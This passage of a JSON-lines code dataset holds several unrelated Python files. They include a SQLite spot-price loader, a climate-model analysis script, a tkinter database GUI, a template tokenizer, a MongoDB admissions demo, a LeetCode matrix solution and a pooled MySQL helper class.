#check table existed\n def check_table(self, tbName):\n sqlCheck = \"SELECT COUNT(*) from sqlite_master WHERE type= 'table' and name = '{0}';\".format(tbName)\n self.com_cursor.execute(sqlCheck)\n #if table existed, than true.\n res = self.com_cursor.fetchone()\n if res == (1,):\n return True\n else:\n return False\n\n def insert_commodity(self, spotList, sfTbList):\n # loop for all sf tables\n for sf in sfTbList:\n # get table date time as string, in order to store into the spot list\n dateTime = sf.replace(\"sf\", \"\")\n # loop for all spot in one table\n for sp in spotList:\n # get spot price from sf table\n # select 现货价格 from table sf in upper loop where 商品 = sp in lower loop\n sqlGet = \"SELECT 现货价格 FROM {0} WHERE 商品 = '{1}'\".format(sf, sp)\n spotPrice = self.sf_cursor.execute(sqlGet).fetchall()\n try:\n spotPrice = spotPrice[0][0]\n except:\n spotPrice = 0\n # insert price to spot table\n # inser into table spot (商品名称) values (商品价格) by update\n sqlInsert = \"UPDATE {0} SET '{1}' = {2} WHERE 日期 = '{3}';\".format(self.spot_tb_name, sp, spotPrice, dateTime)\n self.com_cursor.execute(sqlInsert)\n\n def storage_spot_to_excel(self):\n sqlReadSpot = \"SELECT * FROM spot\"\n dfContent = pd.read_sql(sqlReadSpot, self.com_conn)\n excel_path = \"{0}/database/SpotData.xlsx\".format(self.BASE_DIR)\n dfContent.to_excel(excel_path)\n\n\nif __name__ == '__main__':\n a = Spot()\n","sub_path":"app/create_spot.py","file_name":"create_spot.py","file_ext":"py","file_size_in_byte":4542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"341598561","text":"\"\"\"\nReproduce moist versions of figures 8 and 9 from SB08 using data from the updated ap_2 run. \nUse Emanuel 1995 (On Thermally Direct Circulations...) angular momentum conserving equivalent \npotential temperature (12/11/2018)\n\"\"\"\n\nimport xarray as xr\nimport sh\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom data_handling_updates import gradients as gr, model_constants as mc, make_sym\nfrom climatology import precip_centroid\nfrom pylab import rcParams\nfrom hadley_cell import mass_streamfunction, get_edge_psi\n\n\ndef find_change_lat(div_vt, sanity_check=False):\n # Find latitudes at which div(vt) changes from positive to negative, and set other values to NaN\n sign_changes = ((div_vt >=0.).astype(float).diff('lat') <0.).astype('float')*div_vt.lat\n sign_changes.values[sign_changes.values==0.] = np.nan\n \n # Find the location of the minimum div(vt), the sign change we want will be just south of this\n div_vt_min_loc = div_vt.lat.values[div_vt.argmin('lat').values]\n div_vt_min_loc = xr.DataArray(div_vt_min_loc, coords=[div_vt.xofyear], dims=['xofyear'])\n \n # Subtract the location of the sign changes from that of the minimum and exclude values north of the min\n distance_to_min = (div_vt_min_loc - sign_changes)\n distance_to_min.values[distance_to_min.values<0.] = np.nan\n \n # The closest value to the minimum is the one we want\n change_index = distance_to_min.argmin('lat')\n change_lat = xr.DataArray(div_vt.lat.values[change_index.values], coords=[div_vt.xofyear], dims=['xofyear'])\n \n if sanity_check==True:\n div_vt.plot.contourf(x='xofyear', y='lat')\n change_lat.plot()\n plt.show()\n return change_index, change_lat\n\n\ndef gross_stability(run, moist=False, i=1):\n\n data = xr.open_dataset('/disca/share/rg419/Data_moist/climatologies/' + run + '.nc')\n \n convTtotheta=(1000./data.pfull)**mc.kappa\n \n theta = data.temp * convTtotheta\n theta_equiv = (data.temp + mc.L/mc.cp_air * data.sphum/(1-data.sphum)) * convTtotheta\n \n dthetady = gr.ddy(theta.mean('lon'), vector=False)\n dthetadp = gr.ddp(theta.mean('lon'))\n dthetady_equiv = gr.ddy(theta_equiv.mean('lon'), vector=False)\n dthetadp_equiv = gr.ddp(theta_equiv.mean('lon'))\n \n vdthetady_mean = data.vcomp.mean('lon') * dthetady\n wdthetadp_mean = data.omega.mean('lon') * dthetadp\n vdthetady_mean_equiv = data.vcomp.mean('lon') * dthetady_equiv\n wdthetadp_mean_equiv = data.omega.mean('lon') * dthetadp_equiv\n \n def column_int(var_in):\n var_int = mc.cp_air * var_in.sum('pfull')*5000./mc.grav\n return var_int\n \n div_vt_mean_int = -1. * column_int(wdthetadp_mean + vdthetady_mean)\n div_vt_mean_int_equiv = -1. * column_int(wdthetadp_mean_equiv + vdthetady_mean_equiv)\n \n vt_mean_int = column_int(data.vcomp.mean('lon') * theta.mean('lon'))\n vt_mean_int_equiv = column_int(data.vcomp.mean('lon') * theta_equiv.mean('lon'))\n #vt_mean_int.plot.contourf(x='xofyear', y='lat')\n \n psi = mass_streamfunction(data, a=6376.0e3, dp_in=50.)\n #psi /= 1.e9\n psi = np.abs(psi).max('pfull')\n #plt.figure(2)\n #psi.plot.contourf(x='xofyear', y='lat')\n \n gross_stab = (2.*np.pi * mc.a * np.cos(data.lat*np.pi/180.) * np.abs(vt_mean_int))/psi\n gross_moist_stab = (2.*np.pi * mc.a * np.cos(data.lat*np.pi/180.) * np.abs(vt_mean_int_equiv))/psi\n plt.figure(i)\n gross_moist_stab.plot.contourf(x='xofyear', y='lat', levels=np.arange(0., 2.e5, 2.e4))\n #plt.show()\n \n \ngross_stability('sn_1.000_evap_fluxes_heattrans')\ngross_stability('rt_0.500_heatbudg', i=2)\ngross_stability('rt_0.750_heatbudg', i=3)\ngross_stability('rt_1.250_heatbudg', i=4)\ngross_stability('rt_1.500_heatbudg', i=5)\nplt.show()","sub_path":"paper_2_figs/gross_stability.py","file_name":"gross_stability.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"169580976","text":"import Storage\nimport tkinter\nfrom tkinter import *\nfrom tkinter import messagebox\n\n\ndef show_data_bases():\n data_bases = Storage.showDatabases()\n tree_window = Toplevel(main_window)\n main_window.iconify()\n tree_window.geometry('800x600')\n tree_window.title('Bases de datos')\n main_tree = Frame(tree_window)\n main_tree.pack(fill=BOTH, expand=1)\n canvas_tree = Canvas(main_tree, width=800, height=600)\n canvas_tree.place(x=0, y=0)\n scroll = Scrollbar(main_tree, orient=VERTICAL, command=canvas_tree.yview)\n scroll.pack(side=RIGHT, fill=Y)\n canvas_tree.configure(yscrollcommand=scroll.set)\n canvas_tree.bind('', lambda e: canvas_tree.configure(scrollregion=canvas_tree.bbox('all')))\n scroll_tree = Scrollbar(main_tree, orient=HORIZONTAL, command=canvas_tree.xview)\n scroll_tree.pack(side=BOTTOM, fill=X)\n canvas_tree.configure(xscrollcommand=scroll_tree.set)\n canvas_tree.bind('', lambda e: canvas_tree.configure(scrollregion=canvas_tree.bbox('all')))\n frame_tree = Frame(canvas_tree)\n canvas_tree.create_window((100, 0), width=1000, height=1000, window=frame_tree, anchor='nw')\n canvas_tree.image = PhotoImage(file='C:/Users/Marcos/Desktop/Data/DataBases.png')\n Button(frame_tree, image=canvas_tree.image).pack()\n Label(frame_tree, bg='#C4D3CB', width=200, height=200).place(x=0, y=0)\n Label(frame_tree, image=canvas_tree.image).place(x=150, y=20)\n Button(canvas_tree, text='Regresar', padx=20, pady=5, font='Helvetica 8 bold italic', bg='#FF6666',command=lambda: close_table_window(tree_window, main_window)).place(x=0, y=0)\n y = 200\n n = 0\n top = 600\n for x in data_bases:\n Button(frame_tree, text=x, font='Helvetica 8 bold italic', bg='#CCFF99', padx=15, pady=3).place(x=y, y=top)\n n += 1\n y += 80\n if n == 5:\n n = 0\n y = 200\n top += 30\n\ndef show_functions():\n main_window.iconify()\n function_window = Toplevel(main_window)\n function_window.title('Funciones de las bases de datos')\n function_window.geometry('600x600')\n #function_canvas = Canvas(function_window, width=600, height=600)\n #function_canvas.image = PhotoImage(file='fondo_bases.png')\n #tkinter.Label(function_window, image=function_canvas.image).place(x=0, y=0)\n Button(function_window, text='Regresar', padx=20, pady=5, font='Helvetica 8 bold italic', bg='#FF6666',command=lambda: close_table_window(function_window, main_window)).place(x=0, y=0)\n tkinter.Label(function_window,text='Create Database',font='Helvetica 10 bold italic', width=20).place(x=10, y=50)\n database_name = Entry(function_window,width=20)\n database_name.place(x=150,y=50)\n tkinter.Button(function_window, text='Create',font='Helvetica 10 bold italic', width=10, command= lambda : create_database(database_name.get(),database_name)).place(x=250, y=45)\n tkinter.Label(function_window, text='Alter Database', font='Helvetica 10 bold italic', width=20).place(x=10, y=100)\n alter_data_base = Entry(function_window, width=20)\n alter_data_base.place(x=150, y=100)\n tkinter.Button(function_window, text='Alter', font='Helvetica 10 bold italic', width=10, command=lambda: alter_database(alter_data_base.get(), alter_data_base)).place(x=250, y=95)\n\n\ndef create_database(database,database_name):\n if database:\n result = Storage.createDatabase(database)\n if result == 0:\n messagebox.showinfo(title='Create Database', message='Operacion exitosa')\n elif result == 1:\n messagebox.showinfo(title='Create Database', message='Error en la operacion')\n elif result == 2:\n messagebox.showinfo(title='Create Database', message='Base de datos existente')\n database_name.delete(0,END)\n else:\n messagebox.showinfo(title='Create Database', message='No escribio un nombre')\n print('No qlon')\n\ndef alter_database(info, alter_data_base):\n if info:\n print(info)\n new_name = info.split(',')\n result = Storage.alterDatabase(new_name[0], new_name[1])\n if result == 0:\n messagebox.showinfo(title='Create Database', message='Operacion exitosa')\n elif result == 1:\n messagebox.showinfo(title='Create Database', message='Error en la operacion')\n elif result == 2:\n messagebox.showinfo(title='Create Database', message=new_name[0] + ' no existe')\n elif result == 3:\n messagebox.showinfo(title='Create Database', message=new_name[1] + ' ya existe')\n alter_data_base.delete(0, END)\n else:\n messagebox.showinfo(title='Create Database', message='No escribio un nombre')\n\ndef close_table_window(window, parent):\n window.destroy()\n parent.deiconify()\n\n\n\n\nmain_window = tkinter.Tk()\nmain_window.geometry('600x500')\nmain_window.title('Tytus EDD: Fase 1')\n#imagen = PhotoImage(file='imagenEDD.png')\n#tkinter.Label(main_window, image=imagen).place(x=0, y=0)\ntkinter.Label(main_window, text='Estructuras de datos: Grupo 18', font='Helvetica 16 bold italic', bg='#99CCFF',padx=10, pady=5).place(x=200, y=20)\ntkinter.Button(main_window, text='Reportes', font='Helvetica 16 bold italic', bg='#CCFF99', width=20, height=2, command=show_data_bases).place(x=10, y=100)\ntkinter.Button(main_window, text='Funciones', font='Helvetica 16 bold italic',bg='#CCFF99',width=20, height=2, command=show_functions).place(x=10, y=200)\nmain_window.mainloop()","sub_path":"storage/team18/Interfazz.py","file_name":"Interfazz.py","file_ext":"py","file_size_in_byte":5522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"243225092","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# 导入系统模块\nimport re\nimport os\nfrom enum import Enum\nfrom node import Node, TextNode, VariableNode, NodeList\n\n# 第三方模块\n\n# 导入自定义模块\n\n# 设置环境变量\n\nBLOCK_TAG_START = '{%'\nBLOCK_TAG_END = '%}'\nVARIABLE_TAG_START = '{{'\nVARIABLE_TAG_END = '}}'\nCOMMENT_TAG_START = '{#'\nCOMMENT_TAG_END = '#}'\n# TRANSLATOR_COMMENT_MARK = 'Translators'\n# SINGLE_BRACE_START = '{'\n# SINGLE_BRACE_END = '}'\n\ntag_re = (re.compile('(%s.*?%s|%s.*?%s|%s.*?%s)' %\n (re.escape(BLOCK_TAG_START), re.escape(BLOCK_TAG_END),\n re.escape(VARIABLE_TAG_START), re.escape(VARIABLE_TAG_END),\n re.escape(COMMENT_TAG_START), re.escape(COMMENT_TAG_END))))\n\n\nclass TokenType(Enum):\n TEXT = 0\n VAR = 1\n BLOCK = 2\n COMMENT = 3\n\n\nclass Token:\n def __init__(self, token_type, contents, position=None, lineno=None):\n \"\"\"\n 表示模板中字符串的标记。\n :param token_type: 标记类型,可以是.TEXT、.VAR、.BLOCK或.COMMENT。\n :param contents: 源字符串\n :param position: 包含令牌的起始和结束索引的可选元组\n :param lineno: 标记出现在模板源中的行号。\n \"\"\"\n self.token_type, self.contents = token_type, contents\n self.lineno = lineno\n self.position = position\n pass\n\n def __str__(self):\n token_name = self.token_type.name.capitalize()\n return ('<%s token: \"%s...\">' %\n (token_name, self.contents[:20].replace('\\n', '')))\n\n # def split_contents(self):\n # split = []\n # bits = smart_split(self.contents)\n # for bit in bits:\n # # Handle translation-marked template pieces\n # if bit.startswith(('_(\"', \"_('\")):\n # sentinel = bit[2] + ')'\n # trans_bit = [bit]\n # while not bit.endswith(sentinel):\n # bit = next(bits)\n # trans_bit.append(bit)\n # bit = ' '.join(trans_bit)\n # split.append(bit)\n # return split\n\n\nclass Template(object):\n def __init__(self, template_file_path):\n self.template_string = self.load_template_string(template_file_path)\n\n @staticmethod\n def load_template_string(template_file_path):\n with open(template_file_path, 'r', encoding='UTF-8') as f:\n template_string = f.read()\n return template_string\n\n def tokenize(self):\n \"\"\"\n Split a template string into tokens and annotates each token with its\n start and end position in the source. This is slower than the default\n lexer so only use it when debug is True.\n \"\"\"\n lineno = 1\n result = []\n upto = 0\n # r = tag_re.finditer(self.template_string)\n # print(r)\n for match in tag_re.finditer(self.template_string):\n start, end = match.span()\n if start > upto:\n token_string = self.template_string[upto:start]\n result.append(self.create_token(token_string, (upto, start), lineno, in_tag=False))\n lineno += token_string.count('\\n')\n upto = start\n token_string = self.template_string[start:end]\n result.append(self.create_token(token_string, (start, end), lineno, in_tag=True))\n lineno += token_string.count('\\n')\n upto = end\n last_bit = self.template_string[upto:]\n if last_bit:\n pass\n result.append(self.create_token(last_bit, (upto, upto + len(last_bit)), lineno, in_tag=False))\n return result\n\n def create_token(self, token_string, position, lineno, in_tag):\n # # return Token(TokenType.TEXT, token_string, position, lineno)\n # if in_tag and token_string.startswith(BLOCK_TAG_START):\n # block_content = token_string[2:-2].strip()\n # print(block_content)\n\n if in_tag:\n if token_string.startswith(VARIABLE_TAG_START):\n return Token(TokenType.VAR, token_string[2:-2].strip(), position, lineno)\n elif token_string.startswith(BLOCK_TAG_START):\n block_content = token_string[2:-2].strip()\n return Token(TokenType.BLOCK, block_content, position, lineno)\n else:\n return Token(TokenType.COMMENT, token_string[2:-2].strip(), position, lineno)\n else:\n return Token(TokenType.TEXT, token_string, position, lineno)\n\n\nclass Parser:\n def __init__(self, tokens):\n self.tokens = tokens\n self.command_stack = []\n\n def parse(self):\n nodelist = NodeList()\n while self.tokens:\n token = self.next_token()\n if token.token_type.value == 0: # TokenType.TEXT\n self.extend_nodelist(nodelist, TextNode(token.contents), token)\n elif token.token_type.value == 1: # TokenType.VAR\n if not token.contents:\n raise ValueError(token, 'Empty variable tag on line %d' % token.lineno)\n\n self.extend_nodelist(nodelist, VariableNode(token.contents), token)\n elif token.token_type.value == 2: # TokenType.BLOCK\n pass\n try:\n command = token.contents.split()[0]\n print(command)\n except IndexError:\n raise self.error(token, 'Empty block tag on line %d' % token.lineno)\n\n self.command_stack.append((command, token))\n new_nodelist = NodeList()\n self.extend_nodelist(nodelist, new_nodelist, token)\n nodelist = new_nodelist\n\n def next_token(self):\n return self.tokens.pop(0)\n\n\n def extend_nodelist(self, nodelist, node, token):\n # node.token = token\n nodelist.append(node)\n\n\nif __name__ == '__main__':\n t = Template('1.html')\n r = t.tokenize()\n p = Parser(r)\n p.parse()","sub_path":"Template_Test/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":6010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"366871072","text":"import pymongo\nimport pprint\nimport numpy as np\nfrom pymongo import MongoClient\n\nclient=MongoClient()\nclient = MongoClient('localhost', 27017)\ndb = client['btp']\ncollection = db['collegedemos']\nstudents=db.studentdemos\na=students.count()\n#students.delete_many({\"diaplay\": \"1\"})\nperson=students.find_one({\"inserteddoc\": \"1\"})\n\nsquant=person[\"quant\"]\nsundergrad=person[\"undergrad\"]\nsverb=person[\"verbal\"]\nsawa=person[\"awa\"]\nscol=person[\"college\"]\nscpi=person[\"CPI\"]\nstofel=person[\"TOFEL\"]\nsbranch=person[\"spl\"]\nsmaxcpi=person[\"maxcpi\"]\n\n\n\n#pprint.pprint(students.update_one({\"inserteddoc\": \"1\"}, {\"$set\" : {\"inserteddoc\": \"0\"}}))\n#students.delete_one({\"inserteddoc\": \"1\"})\ncolleges=db.collegedemos\n\n#colleges.update_one({\"Branch\":\"Computer Science\",\"undergrad\":\"IIT BHU\",\"constant\":\"-6.6986\",\"TOFEL\":\"105.4099\",\"quant\":\"-191.8623\",\"verbal\":\"253.4097\",\"awa\":\"-204.1384\",\"college\":\"Texas\",\"CPI\":\" 2497.0398\",\"maxcpi\":\"-127.9907\"})\n\n#for student in students.find():\n#\tpprint.pprint(student)\n\n#colleges.delete_one({\"_id\": \"5ae8aef0ec098d386627467b\"})\n\nclg=colleges.find_one({\"Branch\":sbranch,\"college\":scol,\"undergrad\":sundergrad})\ncconst=clg[\"constant\"]\nctofel=clg[\"TOFEL\"]\ncquant=clg[\"quant\"]\ncverb=clg[\"verbal\"]\ncawa=clg[\"awa\"]\nccpi=clg[\"CPI\"]\ncmaxcpi=clg[\"maxcpi\"]\n\ntofel=(float(stofel)*float(ctofel))\nquant=(float(cquant)*float(squant))\n#print(quant)\nverb=(float(cverb)*float(sverb))\nawa=(float(cawa)*float(sawa))\ncpi=(float(ccpi)*float(scpi))\nmaxcpi=(float(cmaxcpi)*float(smaxcpi))\n\n\n\ncfinal=float(cconst)+float(tofel)+float(quant)+float(verb)+float(awa)+float(cpi)+float(maxcpi)\ncfin=np.sign(cfinal)\n\nif(cfin==1):\n\tstudents.update_one({\"result\": \"1\",\"inserteddoc\": \"1\"}, {\"$set\" : {\"result\": \"can be selected\"}})\nelse:\n\tstudents.update_one({\"result\": \"1\",\"inserteddoc\": \"1\"}, {\"$set\" : {\"result\": \"cannot be selected\"}})\n\n\nstudents.update_one({\"inserteddoc\": \"1\"}, {\"$set\" : {\"inserteddoc\": \"0\"}})\n\n\n\n\n","sub_path":"ml_demo.py","file_name":"ml_demo.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"45232307","text":"# 인자로 주어지는 리스트 L 내에서, 또한 인자로 주어지는 원소 x 가 발견되는 모든 인덱스를 구하여 \n# 이 인덱스들로 이루어진 리스트를 반환하는 함수 solution 을 완성하세요.\n# 리스트 L 은 정수들로 이루어져 있고 그 순서는 임의로 부여되어 있다고 가정하며, \n# 동일한 원소가 반복하여 들어 있을 수 있습니다. \n# 이 안에 정수 x 가 존재하면 그것들을 모두 발견하여 해당 인덱스들을 리스트로 만들어 반환하고, \n# 만약 존재하지 않으면 하나의 원소로 이루어진 리스트 [-1] 를 반환하는 함수를 완성하세요.\n\n# 예를 들어, L = [64, 72, 83, 72, 54] 이고 x = 72 인 경우의 올바른 리턴 값은 [1, 3] 입니다.\n# 또 다른 예를 들어, L = [64, 72, 83, 72, 54] 이고 x = 83 인 경우의 올바른 리턴 값은 [2] 입니다.\n# 마지막으로 또 다른 예를 들어, L = [64, 72, 83, 72, 54] 이고 x = 49 인 경우의 올바른 리턴 값은 [-1] 입니다.\n\ndef solution(L, x):\n answer = []\n\n if x not in L:\n answer = [-1]\n else:\n for i in range(len(L)):\n if x == L[i]:\n answer.append(i)\n return answer","sub_path":"Algorithm/2. Linear Array/search/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"221532386","text":"#Given an m x n binary matrix mat, return the distance of the nearest 0 for each cell.\n\n#The distance between two adjacent cells is 1.\n\n#Example 1:\n#Input: mat = [[0,0,0],[0,1,0],[0,0,0]]\n#Output: [[0,0,0],[0,1,0],[0,0,0]]\n\n#Example 2:\n#Input: mat = [[0,0,0],[0,1,0],[1,1,1]]\n#Output: [[0,0,0],[0,1,0],[1,2,1]]\n\n\n#This solution will look at each position in the matrix outside to in. So I will be looking for places where a solution is possible working from the smallest numbers to the\n#largest. I'll get more on that in a second.\nclass Solution:\n def updateMatrix(self, mat: List[List[int]]) -> List[List[int]]:\n newMat = mat\n count = 0\n mem = []\n #We will be storing where we need to look for values in an array, mem as we don't want to have to iterate through the matrix more than we need to.\n \n #This is establishing where we already know we have solutions and where we need to find them. If the matrix is already a zero, we leave it alone. If not, we store\n #that position to be calculated later.\n for i in range(len(mat)):\n for j in range(len(mat[0])):\n if mat[i][j] == 0:\n count += 1 \n else:\n newMat[i][j] = -1\n mem.append([i,j])\n \n #Index will be used to keep track of where we are in the solution. For the first loop, we will be looking for cells whose solution is one cell away from an answer.\n #This will mean that it is in close proximity to a zero. For the second loop, we will be looking for a \"1\" because these cells are one away from the solution.\n #In this way we will be using previous solutions in order to find the new solutions, making this a dynamic problem. I am solving it this way because this will guarantee\n #that the solution for each cell will be the smallest possible value.\n index = 0\n total = len(mat) * len(mat[0])\n while count < total:\n running = len(mem)\n for i in range(running):\n [row, col] = mem.pop(0) #if we find a solution to this cell, it will remain popped, so it doesn't reappear later.\n if row + 1 < len(mat) and newMat[row + 1][col] == index:\n newMat[row][col] = index + 1\n count += 1\n elif col + 1 < len(mat[0]) and newMat[row][col + 1] == index:\n newMat[row][col] = index + 1\n count += 1\n elif row - 1 >= 0 and newMat[row - 1][col] == index:\n newMat[row][col] = index + 1\n count += 1\n elif col - 1 >= 0 and newMat[row][col - 1] == index:\n newMat[row][col] = index + 1\n count += 1\n else:\n mem.append([row, col]) #if we don't find a solution, we put this cell back into memory to be solved later.\n index += 1\n return newMat\n","sub_path":"01Matrix.py","file_name":"01Matrix.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"130939196","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n@File : db_mysql.py\n@Time : 2021/4/28 11:43 上午\n@Author : yuecong\n@Email : yueconger@163.com\n@Software: PyCharm\n\"\"\"\nimport datetime\nimport json\n\nimport pymysql\nfrom DBUtils.PooledDB import PooledDB\nfrom pymysql import cursors\nfrom pymysql import err\n\nfrom utils.log_custom import logger\n\nlog = logger.log\n\n\ndef auto_retry(func):\n def wapper(*args, **kwargs):\n for i in range(3):\n try:\n return func(*args, **kwargs)\n except (err.InterfaceError, err.OperationalError, err.ProgrammingError) as e:\n log.error('''\n error:%s\n sql: %s\n ''' % (e, kwargs.get('sql') or args[1]))\n\n return wapper\n\n\nclass MysqlDB():\n\n def __init__(self, ip=None, port=None, db=None, user=None, passwd=None, **kwargs):\n\n # 可能会改setting中的值,所以此处不能直接赋值为默认值,需要后加载赋值\n try:\n db_start = pymysql.connect(host=ip, user=user, password=passwd, port=port)\n db_cursor = db_start.cursor()\n self.get_version_sql(db_cursor)\n # 初始化时先判读是否存在数据库db,没有则新建\n self._create_database_sql(db_cursor, db)\n db_start.close()\n\n self.connect_pool = PooledDB(creator=pymysql, mincached=1, maxcached=100, maxconnections=100, blocking=True,\n ping=7,\n host=ip, port=port, user=user, passwd=passwd, db=db, charset='utf8mb4',\n cursorclass=cursors.SSCursor) # cursorclass 使用服务的游标,默认的在多线程下大批量插入数据会使内存递增\n except Exception as e:\n input('''\n ******************************************\n 未链接到mysql数据库,\n 您当前的链接信息为:\n ip = {}\n port = {}\n db = {}\n user = {}\n passwd = {}\n 请参考教程正确安装配置mysql,然后重启本程序 \n Exception: {}'''.format(ip, port, db, user, passwd, str(e))\n )\n import sys\n sys.exit()\n\n def _create_database_sql(self, db_cursor, db):\n db_cursor.execute(\"CREATE DATABASE IF NOT EXISTS `%s` DEFAULT CHARACTER SET utf8mb4;\" % db)\n log.info(f'数据库 {db} 初始化完毕')\n\n def get_version_sql(self, db_cursor):\n db_cursor.execute('SELECT VERSION()')\n data = db_cursor.fetchone()\n log.info(f'sql版本: {data[0]}')\n\n def get_connection(self):\n conn = self.connect_pool.connection(shareable=False)\n # cursor = conn.cursor(cursors.SSCursor)\n cursor = conn.cursor()\n\n return conn, cursor\n\n def close_connection(self, conn, cursor):\n cursor.close()\n conn.close()\n\n def size_of_connections(self):\n '''\n 当前活跃的连接数\n @return:\n '''\n return self.connect_pool._connections\n\n def size_of_connect_pool(self):\n '''\n 池子里一共有多少连接\n @return:\n '''\n return len(self.connect_pool._idle_cache)\n\n @auto_retry\n def find(self, sql, limit=0, to_json=False, cursor=None):\n '''\n @summary:\n 无数据: 返回()\n 有数据: 若limit == 1 则返回 (data1, data2)\n 否则返回 ((data1, data2),)\n ---------\n @param sql:\n @param limit:\n ---------\n @result:\n '''\n conn, cursor = self.get_connection()\n\n cursor.execute(sql)\n\n if limit == 1:\n result = cursor.fetchone() # 全部查出来,截取 不推荐使用\n elif limit > 1:\n result = cursor.fetchmany(limit) # 全部查出来,截取 不推荐使用\n else:\n result = cursor.fetchall()\n\n if to_json:\n columns = [i[0] for i in cursor.description]\n\n # 处理时间类型\n def fix_lob(row):\n def convert(col):\n if isinstance(col, (datetime.date, datetime.time)):\n return str(col)\n elif isinstance(col, str) and (col.startswith('{') or col.startswith('[')):\n try:\n return json.loads(col)\n except:\n return col\n else:\n return col\n\n return [convert(c) for c in row]\n\n result = [fix_lob(row) for row in result]\n result = [dict(zip(columns, r)) for r in result]\n\n self.close_connection(conn, cursor)\n\n return result\n\n def add(self, sql, exception_callfunc=''):\n affect_count = None\n\n try:\n conn, cursor = self.get_connection()\n affect_count = cursor.execute(sql)\n conn.commit()\n\n except Exception as e:\n log.error('''\n error:%s\n sql: %s\n ''' % (e, sql))\n if exception_callfunc:\n exception_callfunc(e)\n finally:\n self.close_connection(conn, cursor)\n\n return affect_count\n\n def add_batch(self, sql, datas):\n '''\n @summary:\n ---------\n @ param sql: insert ignore into (xxx,xxx) values (%s, %s, %s)\n # param datas:[[..], [...]]\n ---------\n @result:\n '''\n affect_count = None\n\n try:\n conn, cursor = self.get_connection()\n affect_count = cursor.executemany(sql, datas)\n conn.commit()\n\n except Exception as e:\n log.error('''\n error:%s\n sql: %s\n ''' % (e, sql))\n finally:\n self.close_connection(conn, cursor)\n\n return affect_count\n\n def update(self, sql):\n try:\n conn, cursor = self.get_connection()\n cursor.execute(sql)\n conn.commit()\n\n except Exception as e:\n log.error('''\n error:%s\n sql: %s\n ''' % (e, sql))\n return False\n else:\n return True\n finally:\n self.close_connection(conn, cursor)\n\n def delete(self, sql):\n try:\n conn, cursor = self.get_connection()\n cursor.execute(sql)\n conn.commit()\n\n except Exception as e:\n log.error('''\n error:%s\n sql: %s\n ''' % (e, sql))\n return False\n else:\n return True\n finally:\n self.close_connection(conn, cursor)\n\n def execute(self, sql):\n try:\n conn, cursor = self.get_connection()\n cursor.execute(sql)\n conn.commit()\n\n except Exception as e:\n log.error('''\n error:%s\n sql: %s\n ''' % (e, sql))\n return False\n else:\n return True\n finally:\n self.close_connection(conn, cursor)\n\n def set_unique_key(self, table, key):\n try:\n sql = 'alter table %s add unique (%s)' % (table, key)\n\n conn, cursor = self.get_connection()\n cursor.execute(sql)\n conn.commit()\n\n except Exception as e:\n log.error(table + ' ' + str(e) + ' key = ' + key)\n return False\n else:\n log.debug('%s表创建唯一索引成功 索引为 %s' % (table, key))\n return True\n finally:\n self.close_connection(conn, cursor)\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"db/db_mysql.py","file_name":"db_mysql.py","file_ext":"py","file_size_in_byte":7846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"241016081","text":"from pyage.core.operator import Operator\nfrom pyage.core.emas import EmasAgent\nfrom pyage.core.operator import Operator\nfrom pyage.solutions.evolution.genotype import PointGenotype, FloatGenotype\nfrom pyage.core.inject import Inject\nfrom random import uniform\n\nfrom blackbox import rastrigin3\n\nimport hashlib\nfrom random import randrange\n\nclass Cache(dict):\n\n _instance = None\n\n def __new__(cls, *args, **kwargs):\n if not cls._instance:\n cls._instance = super(Cache, cls).__new__(\n cls, *args, **kwargs)\n return cls._instance\n\n\nclass AbstractEvaluation(Operator):\n\n @Inject(\"scalarm\")\n def __init__(self):\n super(AbstractEvaluation, self).__init__(FloatGenotype)\n self.cache = Cache()\n\n def _create_key(self, params):\n h = hashlib.new('md5')\n h.update(str(params))\n return h.hexdigest()\n\n\n\nclass ScalarmEmasEvaluation(AbstractEvaluation):\n\n def process(self, population):\n genotype = population[0]\n self.evaluate_genotype(genotype)\n\n\n def evaluate_genotype(self, genotype):\n point = genotype.genes\n key = self._create_key(point)\n cached = self.cache.get(key, None)\n if cached:\n genotype.fitness = cached\n else:\n self.scalarm.schedule_point(point)\n val = self.scalarm.get_result(point)\n self.cache[key] = val\n genotype.fitness = val\n\n\nclass ScalarmNormalEvaluation(ScalarmEmasEvaluation):\n\n # fake_points = [[0.5,0.5,0.5,0.5,0.5,0.5]]*10\n\n min_index = 0\n\n def process(self, population):\n\n points = map(lambda g: g.genes, population)\n # self.scalarm.schedule_multiple_points(points)\n for point in points:\n self.scalarm.schedule_point(point)\n\n self.scalarm._wait_until(self.scalarm.is_batch_complete, 3600)\n\n # for point in self.fake_points:\n # self.scalarm.schedule_point(point)\n #\n # for genotype in population:\n # genes = genotype.genes\n # genotype.fitness = self.scalarm.get_result(genes)\n # print genotype.fitness\n\n results = self.scalarm.get_results(self.min_index, self.min_index+len(points)-1)\n self.min_index += len(points)\n\n for genotype, result in zip(population, results):\n genotype.fitness = result\n\n\n\ndef scalarm_emas_initializer(dims=2,energy=10,size=100,lowerbound=0.0,upperbound=1.0):\n agents = {}\n for i in range(size):\n agent = EmasAgent(FloatGenotype([uniform(lowerbound, upperbound) for _ in range(dims)]), energy)\n agents[agent.get_address()] = agent\n return agents\n","sub_path":"scalarm/interfere.py","file_name":"interfere.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"140265317","text":"def person(salary, grade):\n\n hra = 20/100*salary 